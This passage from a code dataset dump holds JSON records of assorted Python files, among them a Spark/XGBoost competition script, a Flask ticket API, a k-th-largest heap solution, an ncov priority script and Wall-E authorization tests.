SparkConf().setAppName(\"DSCI553\").setMaster('local[*]')\n sc = SparkContext(conf=conf)\n sc.setLogLevel(\"ERROR\")\n\n train_data = pd.read_csv(train_file)\n test_data = pd.read_csv(test_file_name)\n\n user_json_rdd = sc.textFile(user_json_path). \\\n map(json.loads). \\\n map(lambda x: ((x[\"user_id\"]), (x[\"review_count\"], x[\"useful\"], x[\"average_stars\"], x[\"fans\"]))). \\\n persist()\n user_json_dict = user_json_rdd.collectAsMap()\n\n business_json_rdd = sc.textFile(business_json_path) \\\n .map(json.loads) \\\n .map(lambda x: ((x['business_id']), (x['stars'], x['review_count'], get_noise_level(x['attributes']), have_wifi(x['attributes'])))) \\\n .persist()\n business_json_dict = business_json_rdd.collectAsMap()\n\n default_user = {'review_count': user_json_rdd.map(lambda x: x[1][0]).mean(),\n 'userful': 0,\n 'stars': user_json_rdd.map(lambda x: x[1][2]).mean(),\n \"fans\": user_json_rdd.map(lambda x: x[1][3]).mean()}\n default_business = {'review_count': business_json_rdd.map(lambda x: x[1][1]).mean(),\n 'stars': business_json_rdd.map(lambda x: x[1][0]).mean(),\n 'noise': business_json_rdd.map(lambda x: x[1][2]).mean(),\n \"wifi\": business_json_rdd.map(lambda x: x[1][3]).mean()}\n training_data = pd.DataFrame.from_dict(\n get_data(train_data, user_json_dict, business_json_dict, default_user, default_business))\n trainX = np.array(training_data)\n trainY = train_data.stars.values\n\n xgbr = xgb.XGBRegressor(seed=20)\n xgbr.fit(trainX, trainY)\n\n testing_data = pd.DataFrame.from_dict(\n get_data(test_data, user_json_dict, business_json_dict, default_user, default_business))\n testX = np.array(testing_data)\n testY = test_data.stars.values\n prediction = xgbr.predict(testX)\n\n result = pd.DataFrame()\n result[\"user_id\"] = test_data.user_id.values\n result[\"business_id\"] = test_data.business_id.values\n result[\"prediction\"] = prediction\n result.to_csv(output_file_name, header=['user_id', 'business_id', 'prediction'], index=False, sep=',', mode='w')\n\n print(\"Duration: \", time.time() - start_time)\n\n\nfolder_path, test_file_name, output_file_name = sys.argv[1], sys.argv[2], sys.argv[3]\ncompetition(folder_path, test_file_name, output_file_name)\n\n","repo_name":"Ryan-USC/DSCI553","sub_path":"competition/competition.py","file_name":"competition.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29285481887","text":"from copy import deepcopy\nfrom typing import Any, List, Tuple\n\n\ndef dummy_async_context_manager(value):\n class _Inner:\n async def __aenter__(self):\n return value\n\n async def __aexit__(self, *args):\n pass\n\n async def _await_mock(self):\n return value\n\n def __await__(self):\n return self._await_mock().__await__()\n\n return _Inner()\n\n\ndef dummy_async_function(result=None, exc=None, calls=[]):\n async def _inner(*args, **kwargs):\n nonlocal calls\n calls.append((args, kwargs))\n\n if exc:\n raise exc\n return result\n\n return _inner\n\n\ndef locate_key(d: dict, locator: str) -> Tuple[dict, str]:\n ref = d\n last_part, *path = locator.split('.')\n for part in path:\n ref.setdefault(last_part, {})\n ref = ref[last_part]\n last_part = part\n return ref, last_part\n\n\ndef remove_keys(d: dict, *keys: List[str]) -> dict:\n d = deepcopy(d)\n for locator in keys:\n ref, key = locate_key(d, locator)\n del ref[key]\n return d\n\n\ndef set_key(d: dict, locator: str, value: Any) -> dict:\n d = deepcopy(d)\n ref, key = locate_key(d, locator)\n ref[key] = value\n return d\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"pay/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"75042395281","text":"\"\"\"\nMake a standard deck of cards, shuffle the deck, and then draw two cards at\nrandom. Print the two cards.\n\"\"\"\n\nfrom random import choice, shuffle\n\nRANKS = tuple(\"2345678910\") + (\"Jack\", \"Queen\", \"King\", \"Ace\")\nSUITS = (\"Diamonds\", \"Hearts\", \"Clubs\", \"Spades\")\ncards = [f\"{rank} of {suit}\" for rank in RANKS for suit in SUITS]\nshuffle(cards)\n\nfirst_card = choice(cards)\ncards.remove(first_card)\nprint(\"Your first card is the\", first_card)\n\nsecond_card = choice(cards)\ncards.remove(second_card)\nprint(\"\\nYour second card is the\", second_card)\n","repo_name":"Dagonite/python-exercises","sub_path":"Exercises/E02_Medium/E07_Playing_Cards/draw_cards_from_deck.py","file_name":"draw_cards_from_deck.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18331107951","text":"import sys\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n N = NI()\n TA = [NLI() for _ in range(N)]\n nt, na = 0, 0\n for t, a in TA:\n if t >= nt and a >= na:\n nt = t\n na = a\n elif t >= nt and a < na:\n k = na // a if na % a == 0 else na // a + 1\n nt = k*t\n na = k*a\n elif t < nt and a >= na:\n k = nt // t if nt % t == 0 else nt // t + 1\n nt = k*t\n na = k*a\n else:\n kt = nt // t if nt % t == 0 else nt // t + 1\n ka = na // a if na % a == 0 else na // a + 1\n k = max(kt, ka)\n nt = k * t\n na = k * a\n print(nt+na)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Mao-beta/AtCoder","sub_path":"ARC/ARC062/ARC062/ARC062C.py","file_name":"ARC062C.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16444825988","text":"from flask import jsonify, request\nfrom flask.blueprints import Blueprint\n\nfrom main.service.tareas_service import crear_tarea, eliminar_asociaciones\nfrom main.service.tickets_service import (archivar, crear, editar,\n obtener_ticket_por, obtener_data_diaria,\n\t\t\t\t\t\t\t\t\t\t obtener_data_acumulada)\nfrom main.service.tickets_service import \\\n obtener_tickets as obtener_tickets_service\nfrom main.settings import CODIGO_HTTP\n\ntickets = Blueprint('tickets', __name__)\n\n\n@tickets.route('/tickets', methods=['GET'])\ndef obtener_tickets():\n\tquery_params = request.args\n\n\trespuesta = obtener_tickets_service(query_params)\n\n\treturn jsonify(respuesta), CODIGO_HTTP[\"OK\"]\n\n@tickets.route('/tickets/', methods=['GET'])\ndef obtener_ticket(id):\n\ttry:\n\t\tticket = obtener_ticket_por(id)\n\t\treturn jsonify(ticket), CODIGO_HTTP[\"OK\"]\n\texcept:\n\t\treturn jsonify({'mensaje': 'Ticket no encontrado'}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n@tickets.route('/tickets', methods=['POST'])\ndef crear_ticket():\n\ttry:\n\t\tdata = request.get_json()\n\t\tnombre = data['nombre']\n\t\tdescripcion = data['descripcion']\n\t\ttipo = data['tipo'].lower()\n\t\tseveridad = data['severidad'].lower()\n\t\tid_cliente = data['cliente']['id']\n\texcept:\n\t\treturn jsonify({'mensaje': 'Parametros invalidos'}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\t\n\ttry:\n\t\tticket = crear(data)\n\n\t\treturn jsonify(ticket), CODIGO_HTTP[\"OK\"]\n\texcept Exception as e:\n\t\treturn jsonify({'mensaje': str(e)}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n@tickets.route('/tickets/', methods=['PUT'])\ndef editar_ticket(id_ticket):\n\n\ttry:\n\t\tdata = request.get_json()\n\t\tnombre = data['nombre']\n\t\tdescripcion = data['descripcion']\n\t\ttipo = data['tipo'].lower()\n\t\testado = data['estado'].lower()\n\t\tseveridad = data['severidad'].lower()\n\t\tid_cliente = data['cliente']['id']\n\texcept:\n\t\treturn jsonify({'mensaje': 'Parametros invalidos'}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n\ttry:\n\t\teditar(id_ticket, data)\n\t\treturn jsonify(), CODIGO_HTTP[\"NO_CONTENT\"]\n\texcept Exception as e:\n\t\treturn jsonify({'mensaje': str(e)}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n\n@tickets.route('/tickets/', methods=['DELETE'])\ndef archivar_ticket(id_ticket):\n\ttry:\n\t\tarchivar(id_ticket)\n\t\treturn jsonify({'mensaje': 'Ticket archivado con exito!'}), CODIGO_HTTP[\"OK\"]\n\texcept Exception as e:\n\t\treturn jsonify({'mensaje': str(e)}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n@tickets.route('/tickets//tareas', methods=['POST'])\ndef crear_tarea_derivada(id_ticket):\n\ttry:\n\t\tdata = request.get_json()\n\n\t\tcrear_tarea(data, id_ticket)\n\t\t# ('No existe el ticket solicitado'), CODIGO_HTTP[\"NOT_FOUND\"]\n\n\t\treturn jsonify({'mensaje': \"Tarea asociada a ticket exitosamente\"}), CODIGO_HTTP[\"OK\"]\n\texcept Exception as e:\n\t\treturn jsonify({'mensaje': str(e)}), CODIGO_HTTP[\"BAD_REQUEST\"]\n\n@tickets.route('/tickets/data_diaria', methods=['GET'])\ndef data_diaria():\n\ttickets_cerrados, tickets_abiertos = obtener_data_diaria()\n\treturn {'tickets_cerrados' : tickets_cerrados, 'tickets_abiertos' : tickets_abiertos}\n\n\n\n@tickets.route('/tickets/data_acumulada', methods=['GET'])\ndef data_acumulada():\n\treturn jsonify(obtener_data_acumulada())\n\n\n@tickets.route('/tickets/tareas/', methods=['DELETE'])\ndef eliminar_asociaciones_ticket(id_tarea):\n\teliminar_asociaciones(id_tarea)\n\treturn jsonify({'mensaje': 'Tickets desasociados con exito'}), CODIGO_HTTP[\"OK\"]","repo_name":"eprediger/psa-support","sub_path":"app/main/controller/tickets_controller.py","file_name":"tickets_controller.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27019517345","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Author : 1230\n# @Email : xjh_0125@sina.com\n# @Time : 2019/12/23 16:30\n# @Software: PyCharm\n# @File : maximum_heap.py\n\nclass Solution:\n def __init__(self):\n '''\n\n '''\n self.arr = []\n self.k = 0\n\n def build_heap(self):\n count = len(self.arr) // 2\n for i in range(count, -1, -1):\n self.heapify(self.arr, len(self.arr), i)\n\n def heapify(self, arr, heap_size, pos):\n '''\n 构建最小堆 跟节点最小,左子树大于右子树\n 按照索引排\n 0\n 1 * 2\n 3 4 * 5 6\n :param arr:生成堆的源数组\n :param heap_size: 堆大小 小于等于len(arr)\n :param pos:堆顶点位置\n :return:\n '''\n count, l, r = heap_size, pos * 2 + 1, pos * 2 + 2\n while l < count or r < count:\n largest = l\n if r < count and arr[l] > arr[r]:\n largest = r\n if arr[pos] <= arr[largest]:\n break\n else:\n self.swap(arr, pos, largest)\n pos = largest # 此时largest为左或右子树,再遍历当前节点的左右子树\n l = pos * 2 + 1\n r = pos * 2 + 2\n\n def swap(self, arr, i, j):\n arr[i], arr[j] = arr[j], arr[i]\n\n def insert(self, val):\n if self.arr[0] < val:\n self.arr[0] = val\n self.build_heap()\n\n def findKthLargest(self, nums, k: int) -> int:\n self.k = k\n self.arr = nums[:k]\n self.build_heap()\n for i in nums[k:]:\n self.insert(i)\n return self.arr[0]\n\n\nif __name__ == '__main__':\n s = Solution()\n arr = [3, 2, 3, 1, 2, 4, 5, 5, 6]\n k = 4\n res = s.findKthLargest(arr, k)\n print(res, s.arr)\n","repo_name":"xjh1230/py_algorithm","sub_path":"data_structure/maximum_heap.py","file_name":"maximum_heap.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"918151367","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"new\", views.add_listing, name=\"add\"),\n path(\"listing/\", views.listing, name=\"listing\"),\n path(\"watchlist/\", views.watchlist, name=\"watchlist\"),\n path(\"bid\", views.bid, name=\"bid\"),\n path(\"close\", views.closeauction, name=\"close\"),\n path(\"comment\", views.comment, name=\"comment\"),\n path(\"categories\", views.categories, name=\"categories\")\n]\n","repo_name":"Rehtest/CS50WCommerce","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71204825362","text":"\"\"\"\ncalculate priorties from index and proximities\n\"\"\"\nimport argparse\nfrom random import shuffle\nfrom collections import defaultdict\nimport numpy as np\nimport pandas as pd\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=\"generate priorities files based on genetic proximity to focal sample\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\"--sequence-index\", type=str, required=True, help=\"sequence index file\")\n parser.add_argument(\"--proximities\", type = str, required=True, help=\"tsv file with proximities\")\n parser.add_argument(\"--Nweight\", type = float, default=0.003, required=False, help=\"parameterizes de-prioritization of incomplete sequences\")\n parser.add_argument(\"--crowding-penalty\", type = float, default=0.1, required=False, help=\"parameterizes how priorities decrease when there is many very similar sequences\")\n parser.add_argument(\"--output\", type=str, required=True, help=\"tsv file with the priorities\")\n args = parser.parse_args()\n\n proximities = pd.read_csv(args.proximities, sep='\\t', index_col=0)\n index = pd.read_csv(args.sequence_index, sep='\\t', index_col=0)\n combined = pd.concat([proximities, index], axis=1)\n\n closest_matches = combined.groupby('closest strain')\n candidates = {}\n for focal_seq, seqs in closest_matches.groups.items():\n tmp = combined.loc[seqs, [\"distance\", \"N\"]]\n # penalize larger distances and more undetermined sites. 1/args.Nweight are 'as bad' as one extra mutation\n tmp[\"priority\"] = -tmp.distance - tmp.N*args.Nweight\n name_prior = [(name, d.priority) for name, d in tmp.iterrows()]\n shuffle(name_prior)\n candidates[focal_seq] = sorted(name_prior, key=lambda x:x[1], reverse=True)\n\n # export priorities\n crowding = args.crowding_penalty\n with open(args.output, 'w') as fh:\n # loop over lists of sequences that are closest to particular focal sequences\n for cs in candidates.values():\n # these sets have been sorted by priorities after shuffling -- reduce priorities in this shuffled/sorted order\n for i, (name, pr) in enumerate(cs):\n fh.write(f\"{name}\\t{pr-i*crowding:1.2f}\\n\")\n","repo_name":"nextstrain/ncov","sub_path":"scripts/priorities.py","file_name":"priorities.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":1348,"dataset":"github-code","pt":"3"} +{"seq_id":"8390266753","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef result_process(data_list):\n texts = ''\n\n for item in data_list:\n for i in item:\n texts += str(*i, )\n\n texts = texts.split('\\n')\n\n return texts\n\n\ndef get_personal_horoscope_by_day_and_tomorrow(zodiac_sign: str, day='today'):\n try:\n res = requests.get(f\"https://horo.mail.ru/prediction/{zodiac_sign}/{day}/\")\n soup = BeautifulSoup(res.content, 'html.parser')\n list_data = soup.find_all('div', attrs={'class': 'article__item article__item_alignment_left article__item_html'})\n\n group_texts_1 = ''\n group_texts_2 = ''\n\n all_text = []\n delimiter = 0\n\n if list_data:\n texts = result_process(list_data)\n\n for i in range(len(texts)):\n if i == delimiter:\n group_texts_1 += texts[i] + ' '\n else:\n group_texts_2 += texts[i] + ' '\n\n all_text.append(group_texts_1[:-1])\n all_text.append(group_texts_2[:-1])\n else:\n return None\n\n return all_text\n\n except requests.exceptions.ConnectionError:\n return None\n\n\ndef get_personal_horoscope_by_week_and_month(zodiac_sign: str, day='week'):\n try:\n res = requests.get(f\"https://horo.mail.ru/prediction/{zodiac_sign}/{day}/\")\n soup = BeautifulSoup(res.content, 'html.parser')\n data_list = soup.find_all('div', attrs={'class': 'article__item article__item_alignment_left article__item_html'})\n\n group_texts_1 = ''\n group_texts_2 = ''\n group_texts_3 = ''\n\n all_text = []\n delimiter = 0\n sentence_limit = 3\n\n if data_list:\n texts = result_process(data_list)\n sentences = len(texts)\n\n for i in range(sentences):\n if day == 'month':\n if sentences == sentence_limit:\n if i == delimiter:\n group_texts_1 += texts[i] + ' '\n elif i == delimiter + 1 or i == delimiter + 2:\n group_texts_2 += texts[i] + ' '\n else:\n group_texts_3 += texts[i] + ' '\n else:\n if i == delimiter:\n group_texts_1 += texts[i] + ' '\n elif i == delimiter + 1:\n group_texts_2 += texts[i] + ' '\n else:\n group_texts_3 += texts[i] + ' '\n else:\n if i == delimiter:\n group_texts_1 += texts[i] + ' '\n else:\n group_texts_2 += texts[i] + ' '\n\n all_text.append(group_texts_1)\n all_text.append(group_texts_2)\n\n if group_texts_3 != '':\n all_text.append(group_texts_3)\n else:\n return None\n\n return all_text\n\n except requests.exceptions.ConnectionError:\n return None\n","repo_name":"IlyaCherevachenko/Web-site-Horoscope-","sub_path":"parcer/parcing_personal_horoscope.py","file_name":"parcing_personal_horoscope.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29173620927","text":"\"\"\"Tests authorization.\"\"\"\n\nimport http.client\n\nimport pytest\n\nfrom infra.walle.server.tests.lib.util import MonkeyPatch, patch, monkeypatch_config, monkeypatch_method, TestCase\nfrom sepelib.core import config\nfrom walle.application import app\nfrom walle.authorization import csrf, blackbox\nfrom walle.clients import staff\nfrom walle.errors import UnauthorizedError\nfrom walle.hosts import HostUnderMaintenanceError, HostState\nfrom walle.util.api import api_handler, admin_request, api_response\n\n\n@pytest.fixture(autouse=True, scope=\"module\")\ndef test(request):\n monkeypatch = MonkeyPatch()\n request.addfinalizer(monkeypatch.undo)\n\n # Required by api_handler decorator\n monkeypatch.setattr(app, \"flask\", None)\n monkeypatch.setattr(app, \"_Application__services\", None)\n monkeypatch.setattr(app, \"_Application__logging_initialized\", None)\n monkeypatch.setattr(TestCase, \"_app_initialized\", False)\n app.init_flask()\n\n with app.init_blueprint(\"api\", \"/v1\") as mock_api_blueprint:\n app.api_blueprint = mock_api_blueprint\n create_handlers()\n\n # these are special kind of tests that test on handlers instead of those registered in api.\n # stub blueprint creating to keep thing untouched after this test finishes.\n monkeypatch_method(monkeypatch, app.setup_api_blueprint)\n monkeypatch_method(monkeypatch, app.setup_cms_api_blueprint)\n monkeypatch_method(monkeypatch, app.setup_metrics_blueprint)\n\n\ndef create_handlers():\n @api_handler(\"/test/authentication\", \"GET\")\n def unauthorized_handler():\n return api_response({\"status\": \"unauthenticated\"})\n\n @api_handler(\n \"/test/authentication\",\n (\"OPTION\", \"POST\"),\n {\n \"type\": \"object\",\n \"properties\": {},\n \"additionalProperties\": False,\n },\n authenticate=True,\n )\n def authenticated_handler(issuer, request=None):\n return api_response({\"status\": \"authenticated\", \"issuer\": issuer})\n\n @api_handler(\n \"/test/admin_authorization\",\n \"POST\",\n {\n \"type\": \"object\",\n \"properties\": {},\n \"additionalProperties\": False,\n },\n authenticate=True,\n )\n @admin_request\n def authorized_admin_handler(issuer, request):\n return api_response({\"status\": \"authorized_admin\", \"issuer\": issuer})\n\n\n@pytest.fixture\ndef clear_auth_cache():\n blackbox._AUTHENTICATION_FALLBACK_CACHE.clear()\n blackbox._AUTHENTICATION_HOT_CACHE.clear()\n\n\ndef test_unauthenticated(walle_test, iterate_authentication):\n result = walle_test.api_client.get(\"/v1/test/authentication\")\n assert result.status_code == http.client.OK\n assert result.json == {\"status\": \"unauthenticated\"}\n\n\n@patch(\n \"walle.authorization.blackbox.authenticate\", return_value=blackbox.AuthInfo(issuer=\"issuer-mock\", session_id=None)\n)\ndef test_authenticated_ok(authenticate, walle_test):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={})\n assert result.status_code == http.client.OK\n assert result.json == {\"status\": \"authenticated\", \"issuer\": \"issuer-mock\"}\n authenticate.assert_called_once_with(config.get_value(\"oauth.client_id\"))\n\n\ndef test_authentication_failure(walle_test, unauthenticated):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={})\n assert result.status_code == http.client.UNAUTHORIZED\n unauthenticated.assert_called_once_with(config.get_value(\"oauth.client_id\"))\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\ndef test_authentication_blackbox_request_failure(authenticate, walle_test, clear_auth_cache):\n with patch(\n \"walle.authorization.blackbox._authenticate\", side_effect=blackbox.BlackBoxCommunicationError(\"Mocked Error\")\n ):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={}, headers={\"Authorization\": \"\"})\n assert result.status_code == http.client.INTERNAL_SERVER_ERROR\n assert result.json[\"message\"] == \"Internal error occurred: Error in communication with blackbox: Mocked Error\"\n assert result.json[\"result\"] == \"FAIL\"\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\n@pytest.mark.parametrize(\"header_value\", [\"OAuth\", \"OAuth \"])\ndef test_authentication_blackbox_request_invalid_header(authenticate, walle_test, clear_auth_cache, header_value):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={}, headers={\"Authorization\": header_value})\n assert result.status_code == http.client.UNAUTHORIZED\n assert result.json[\"message\"] == \"Authentication failed: Authentication failed: Authorization token is empty\"\n assert result.json[\"result\"] == \"FAIL\"\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\ndef test_authentication_blackbox_request_cache_fallback(authenticate, walle_test, clear_auth_cache):\n side_effects = [\n blackbox.AuthInfo(issuer=walle_test.api_issuer, session_id=None),\n blackbox.BlackBoxCommunicationError(\"Mocked Error\"),\n ]\n\n with patch(\"walle.authorization.blackbox._authenticate\", side_effect=side_effects):\n for _ in (1, 2):\n result = walle_test.api_client.post(\"/v1/test/authentication\", data={}, headers={\"Authorization\": \"\"})\n assert result.status_code == http.client.OK\n assert result.json == {\"status\": \"authenticated\", \"issuer\": walle_test.api_issuer}\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\ndef test_csrf_ok(authenticate, walle_test, mp, clear_auth_cache):\n monkeypatch_config(mp, \"authorization.csrf_key\", \"0000\")\n session_id = \"6a37bb251c8590267ec03770125ae5271a8c74c9\"\n valid_csrf_token = csrf.get_csrf_token(session_id)\n session_header = \"Session_id={}; Domain=localhost; Path=/\".format(session_id)\n\n with patch(\"walle.authorization.blackbox._authenticate\", return_value=(walle_test.api_issuer, session_id)):\n for method in (\"GET\", \"OPTION\", \"POST\"):\n result = walle_test.api_client.open(\n \"/v1/test/authentication\",\n method=method,\n data={},\n headers={\"X-CSRF-TOKEN\": valid_csrf_token, \"Cookie\": session_header},\n )\n assert result.status_code == http.client.OK\n\n\n@patch(\"walle.authorization.blackbox.authenticate\", side_effect=blackbox._authenticate_cached)\ndef test_csrf_fail(authenticate, walle_test, mp, clear_auth_cache):\n monkeypatch_config(mp, \"authorization.csrf_key\", \"0000\")\n session_id = \"6a37bb251c8590267ec03770125ae5271a8c74c9\"\n session_header = \"Session_id={}; Domain=localhost; Path=/\".format(session_id)\n\n with patch(\n \"walle.authorization.blackbox._authenticate\",\n side_effect=[\n (walle_test.api_issuer, session_id),\n # these does not affect the result, auth was cached after the first GET request.\n blackbox.UnauthenticatedError(\"Mock CSRF token error\"),\n blackbox.UnauthenticatedError(\"Mock CSRF token error\"),\n ],\n ):\n for method, code in ((\"GET\", http.client.OK), (\"OPTION\", http.client.OK), (\"POST\", http.client.UNAUTHORIZED)):\n result = walle_test.api_client.open(\n \"/v1/test/authentication\",\n method=method,\n data={},\n headers={\"X-CSRF-TOKEN\": \"INVALID TOKEN\", \"Cookie\": session_header},\n )\n assert result.status_code == code\n\n\ndef test_admin_authorization_ok(walle_test, authorized_admin):\n result = walle_test.api_client.post(\"/v1/test/admin_authorization\", data={})\n assert result.status_code == http.client.OK\n assert result.json == {\"status\": \"authorized_admin\", \"issuer\": walle_test.api_issuer}\n\n\ndef test_admin_authorization_failure(walle_test):\n result = walle_test.api_client.post(\"/v1/test/admin_authorization\", data={})\n assert result.status_code == http.client.FORBIDDEN\n\n\n@patch(\"walle.clients.staff.get_user_groups\", return_value={\"@group1\", \"@group2\"})\ndef test_project_authorization(get_user_groups, walle_test, mp):\n project = walle_test.mock_project({\"id\": \"some-id\", \"owners\": [\"owner0\", \"owner1\"]})\n project.authorize(\"owner1@\")\n\n with pytest.raises(UnauthorizedError):\n project.authorize(\"owner2@\")\n\n monkeypatch_config(mp, \"authorization.admins\", [\"owner2\"])\n project.authorize(\"owner2@\")\n\n\n@patch(\"walle.clients.staff.get_user_groups\", return_value={\"@group1\", \"@group2\"})\ndef test_project_authorization_by_group(get_user_groups, walle_test):\n project1 = walle_test.mock_project({\"id\": \"some-id-1\", \"owners\": [\"owner1\", \"@group1\"]})\n project2 = walle_test.mock_project({\"id\": \"some-id-2\", \"owners\": [\"owner1\", \"@group3\"]})\n\n project1.authorize(\"owner1@\")\n project1.authorize(\"owner2@\")\n\n project2.authorize(\"owner1@\")\n with pytest.raises(UnauthorizedError):\n project2.authorize(\"owner2@\")\n\n\nclass TestHostAuthorization:\n @pytest.fixture(params=[\"owner1@\", \"owner2@\", None])\n def host(self, request, walle_test, mp):\n mp.function(staff.get_user_groups, return_value={\"@group1\", \"@group2\"})\n project = walle_test.mock_project({\"id\": \"some-id\", \"owners\": [\"owner0\", \"owner1\"]})\n host = walle_test.mock_host({\"project\": project.id, \"status_author\": request.param})\n return host\n\n @pytest.mark.parametrize(\"ignore_maintenance\", [True, False])\n def test_allows_explicit_owners(self, host, ignore_maintenance):\n host.authorize(\"owner1@\", ignore_maintenance=ignore_maintenance)\n\n @pytest.mark.parametrize(\"ignore_maintenance\", [True, False])\n def test_raises_on_member_not_in_owners(self, host, ignore_maintenance):\n with pytest.raises(UnauthorizedError):\n host.authorize(\"owner2@\", ignore_maintenance=ignore_maintenance)\n\n @pytest.mark.parametrize(\"ignore_maintenance\", [True, False])\n def test_raises_on_admins_not_in_owners(self, mp, host, ignore_maintenance):\n monkeypatch_config(mp, \"authorization.admins\", [\"owner2\"])\n with pytest.raises(UnauthorizedError):\n host.authorize(\"owner2@\", ignore_maintenance=ignore_maintenance)\n\n\n@patch(\"walle.clients.staff.get_user_groups\", return_value={\"@group1\", \"@group2\"})\ndef test_host_under_maintenance(get_user_groups, walle_test, mp):\n project = walle_test.mock_project({\"id\": \"some-id\", \"owners\": [\"owner0\", \"owner1\"]})\n host1 = walle_test.mock_host(\n {\"inv\": 1, \"project\": project.id, \"state\": HostState.MAINTENANCE, \"state_author\": \"owner0@\"}\n )\n host2 = walle_test.mock_host(\n {\"inv\": 2, \"project\": project.id, \"state\": HostState.MAINTENANCE, \"state_author\": None}\n )\n\n monkeypatch_config(mp, \"authorization.admins\", [\"owner0\", \"owner1\"])\n\n # Host is under maintenance, authorizing it's owner\n host1.authorize(\"owner0@\", ignore_maintenance=False)\n host1.authorize(\"owner0@\", ignore_maintenance=True)\n\n # Host is not under maintenance, no state owner\n host2.authorize(\"owner0@\", ignore_maintenance=False)\n host2.authorize(\"owner0@\", ignore_maintenance=True)\n\n with pytest.raises(HostUnderMaintenanceError):\n host1.authorize(\"owner1@\", ignore_maintenance=False)\n\n # Host is under maintenance, authorizing with force\n host1.authorize(\"owner1@\", ignore_maintenance=True)\n\n # Host is not under maintenance, no state owner\n host2.authorize(\"owner1@\", ignore_maintenance=True)\n host2.authorize(\"owner1@\", ignore_maintenance=False)\n\n\n@patch(\"walle.clients.staff.get_user_groups\", return_value={\"@group1\", \"@group2\"})\ndef test_host_authorization_by_group(get_user_groups, walle_test):\n project1 = walle_test.mock_project({\"id\": \"some-id-1\", \"owners\": [\"owner1\", \"@group1\"]})\n host1 = walle_test.mock_host({\"project\": project1.id, \"inv\": 1})\n\n project2 = walle_test.mock_project({\"id\": \"some-id-2\", \"owners\": [\"owner1\", \"@group3\"]})\n host2 = walle_test.mock_host({\"project\": project2.id, \"inv\": 2})\n\n host1.authorize(\"owner1@\", ignore_maintenance=False)\n host1.authorize(\"owner2@\", ignore_maintenance=False)\n\n host2.authorize(\"owner1@\", ignore_maintenance=False)\n with pytest.raises(UnauthorizedError):\n host2.authorize(\"owner2@\", ignore_maintenance=False)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/api/test_authorization.py","file_name":"test_authorization.py","file_ext":"py","file_size_in_byte":12306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14885882384","text":"import logging\nimport os\nimport random\nfrom datetime import datetime\n\nimport numpy as np\nimport pandas as pd\nimport sklearn\nfrom sklearn.model_selection import StratifiedKFold, cross_val_predict\n\nfrom util.caching import _s3_path, cache_forever\nfrom util.serialization import load_json\n\n\nclass BaseEstimator(sklearn.base.BaseEstimator):\n __variant__ = None\n\n # NOTE: You need to override with named parameters in order to benefit from\n # get_params() and set_params() for fit-model.\n def __init__(self):\n pass\n\n @classmethod\n def name(cls, variant=None, full=False):\n components = [_f for _f in [cls.__name__, variant or cls.__variant__] if _f]\n name = \"::\".join(components)\n if full:\n name = cls.__module__ + \".\" + name\n return name\n\n @classmethod\n def get(cls, force=False, use_s3=True, use_disk=True, use_memory=True, **kwargs):\n # FIXME: Make sure this only runs after memory cache miss.\n model = cls.__get(param_kwargs=kwargs, use_s3=use_s3, use_disk=use_disk, \n use_memory=use_memory, force=force)\n model._check_inconsistent_params(**kwargs)\n return model\n\n @classmethod\n @cache_forever\n def __get(cls, param_kwargs={}, use_s3=True, use_disk=True, use_memory=True, force=False):\n return cls.build(**param_kwargs)\n\n def 